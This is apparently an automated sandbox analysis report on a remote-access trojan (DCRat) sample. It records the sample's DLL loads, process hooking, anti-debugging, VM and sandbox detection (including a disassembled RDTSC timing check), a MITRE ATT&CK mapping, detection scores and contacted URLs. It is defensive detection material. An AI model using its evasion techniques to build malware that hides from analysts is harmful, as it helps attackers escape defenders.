Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe

Static file information: File size 5805568 > 1048576

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe

Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x583e00

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe	Static PE information: section name: .vmp0
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe	Static PE information: section name: .vmp1

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004C854D push ecx; ret	0_2_004C8560
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004C6E90 push ecx; ret	0_2_004C6EA3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0048D255 push ecx; ret	0_2_0048D268

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 1210005 value: E9 2B BA CB 75	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 76ECBA30 value: E9 DA 45 34 8A	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 1230008 value: E9 8B 8E CE 75	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 76F18E90 value: E9 80 71 31 8A	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 1250005 value: E9 8B 4D 9A 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 75BF4D90 value: E9 7A B2 65 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 1260005 value: E9 EB EB 9A 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 75C0EBF0 value: E9 1A 14 65 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 1270005 value: E9 8B 8A D6 73	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 74FD8A90 value: E9 7A 75 29 8C	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 1280005 value: E9 2B 02 D8 73	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 75000230 value: E9 DA FD 27 8C	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 12A0005 value: E9 8B 2F C6 75	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 76F02F90 value: E9 7A D0 39 8A	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 12B0007 value: E9 EB DF C8 75	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Memory written: PID: 6916 base: 76F3DFF0 value: E9 1E 20 37 8A	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe	Binary or memory string: 2SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

RDTSC instruction interceptor: First address: 93D49E second address: 8CBA1C instructions: 0x00000000 rdtsc 0x00000002 shl ch, 0000002Bh 0x00000005 adc ecx, 7E935657h 0x0000000b sub ecx, eax 0x0000000d sub ebp, 00000008h 0x00000013 mov dword ptr [ebp+00h], edx 0x00000017 mov dword ptr [ebp+04h], eax 0x0000001a lea edi, dword ptr [edi-00000004h] 0x00000020 rcl ch, FFFFFF8Eh 0x00000023 sar ch, FFFFFF97h 0x00000026 mov ecx, dword ptr [edi] 0x00000028 stc 0x00000029 jmp 00007F4244B787D5h 0x0000002e xor ecx, ebx 0x00000030 sub ecx, 19337904h 0x00000036 cmc 0x00000037 rol ecx, 02h 0x0000003a clc 0x0000003b xor ecx, 3E167F9Fh 0x00000041 cmp esp, 354D524Dh 0x00000047 jmp 00007F4244D04C72h 0x0000004c not ecx 0x0000004e cmc 0x0000004f test eax, edi 0x00000051 xor ebx, ecx 0x00000053 add esi, ecx 0x00000055 jmp 00007F424507F8A9h 0x0000005a jmp 00007F42448FA6D3h 0x0000005f lea edx, dword ptr [esp+60h] 0x00000063 cmp bp, di 0x00000066 stc 0x00000067 cmp ebp, edx 0x00000069 ja 00007F42450080C9h 0x0000006f push esi 0x00000070 ret 0x00000071 mov ecx, dword ptr [ebp+00h] 0x00000075 rol al, cl 0x00000077 cbw 0x00000079 add ebp, 00000004h 0x0000007f sub eax, 766F1A91h 0x00000084 rdtsc

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Special instruction interceptor: First address: 824AAC instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Special instruction interceptor: First address: CE63D6 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_004757E0 __fassign,FindFirstFileA,FindClose,FindFirstFileA,		0_2_004757E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0070D95B FindFirstFileA,		0_2_0070D95B

Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.000000000140F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.000000000140F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Process queried: DebugObjectHandle			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Code function: 0_2_00430B40 _memset,_sprintf,CreateProcessA,CloseHandle,CloseHandle,_memset,SetCurrentDirectoryA,ShellExecuteEx,FormatMessageA,

0_2_00430B40

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Code function: 0_2_004124A0 keybd_event,

0_2_004124A0

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: @TextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAll...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefUnicodeHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersLabelTypeCountLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPFuncRemoveClipboardFormatListeneruser32AddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMeRegClassAutoHotkey2Shell_TrayWndCreateWindoweditConsolasLucida ConsoleErrorLevel <>=/\|^,:&~!()[]{}+-?."'\;`IFWHILEClass>AUTOHOTKEY SCRIPT<Could not extract script from EXE./#CommentFlag/and<>=/\|^,:<>=/\|^,:.+-&!?~::?- Continuation section too long.JoinLTrimRTrimMissing ")"Functions cannot contain functions.Missing "{"Not a valid method, class or property definition.GetSetNot a valid property getter/setter.Hotkeys/hotstrings are not allowed inside functions.IfWin should be #IfWin.+%s%s%sThis hotstring
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: Progman
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory

Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: MsMpEng.exe

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: WIN_XP
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%IxpPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameApsapi
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: WIN_VISTA
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: WIN_7
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: WIN_8
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: WIN_8.1

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_00416C60 DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DeleteObject,DestroyCursor,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,DeleteObject,RemoveClipboardFormatListener,	0_2_00416C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_00416E04 DeleteObject,RemoveClipboardFormatListener,	0_2_00416E04
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_0041757E RemoveClipboardFormatListener,	0_2_0041757E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe	Code function: 0_2_00417520 AddClipboardFormatListener,RemoveClipboardFormatListener,	0_2_00417520

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Masquerading	1 Credential API Hooking	431 Security Software Discovery	Remote Services	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Process Injection	12 Virtualization/Sandbox Evasion	111 Input Capture	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	111 Input Capture	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.FileRepMalware.1111.23697.exe	79%	ReversingLabs	Win32.Trojan.DCRat
SecuriteInfo.com.FileRepMalware.1111.23697.exe	74%	Virustotal		Browse
SecuriteInfo.com.FileRepMalware.1111.23697.exe	100%	Avira	HEUR/AGEN.1314063
SecuriteInfo.com.FileRepMalware.1111.23697.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
github.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.tiktok.com/	0%	URL Reputation	safe
https://github.com/solutions/industries/financial-services	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j	0%	Avira URL Cloud	safe
https://github.com/s	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser	0%	Avira URL Cloud	safe
https://github.com/notifications/beta/shelf	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png	0%	Avira URL Cloud	safe
https://github.com/solutions/industries/financial-services	0%	Virustotal		Browse
https://autohotkey.com	0%	Avira URL Cloud	safe
https://github.com/notifications/beta/shelf	0%	Virustotal		Browse
https://github.com/s	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-5a335cbe	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png	0%	Virustotal		Browse
https://github.com/github/roadmap	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/site-3ab44dbdb8a0.css	0%	Avira URL Cloud	safe
https://github.com/solutions/devsecops	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-0c7b5281bcc9.css	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo	1%	Virustotal		Browse
https://github.careers	100%	Avira URL Cloud	malware
https://github.com/github/roadmap	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-5a335cbe	0%	Virustotal		Browse
https://github.githubassets.com/assets/site-3ab44dbdb8a0.css	0%	Virustotal		Browse
https://x.com/github	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/sessions-599dffba3e8f.js	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-0c7b5281bcc9.css	0%	Virustotal		Browse
https://github.careers	4%	Virustotal		Browse
https://github.com/edu	0%	Avira URL Cloud	safe
https://github.com/customer-stories	0%	Avira URL Cloud	safe
https://github.com/solutions/devsecops	0%	Virustotal		Browse
https://autohotkey.com	0%	Virustotal		Browse
